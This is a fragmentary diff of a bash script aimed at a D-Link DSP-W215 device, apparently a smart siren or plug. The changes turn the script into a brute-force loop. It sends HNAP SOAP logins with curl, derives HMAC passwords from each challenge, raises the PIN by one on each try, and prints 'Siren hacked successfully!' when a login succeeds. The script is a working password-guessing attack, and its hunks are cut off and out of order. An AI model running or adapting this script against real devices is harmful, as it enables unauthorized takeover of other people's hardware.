#!/bin/bash
#modify next two line for your DSP-W215
-IP="192.168.0.35"
-PIN=215530
+IP="192.168.0.4"
+#PIN=0
+PIN=215500
#do not modify after this line if you don't know what you are doing
function usage {
message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
loginrequest="$head$message$end"
+loop=true
+while $loop
+ do
+
ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
function getResult {
echo -n "$opt"
}
-PIN=0
-
-while true
- do
-echo -e $PIN
+echo -e "Current pin: $PIN"
let PIN=$PIN+1
challenge=`getResult Challenge`
cookie="Cookie: uid=`getResult Cookie`"
publickey="`getResult PublicKey`$PIN"
+echo -e "Public key: $publickey"
privatekey=`hash_hmac "$challenge" "$publickey"`
password=`hash_hmac "$challenge" "$privatekey"`
timestamp=`date +%s`
mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
echo -e "$mret"
+status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
+echo -e "Status: $status\n\n"
+if [ $status = "success" ]
+then
+ echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
+ loop=false
+fi
done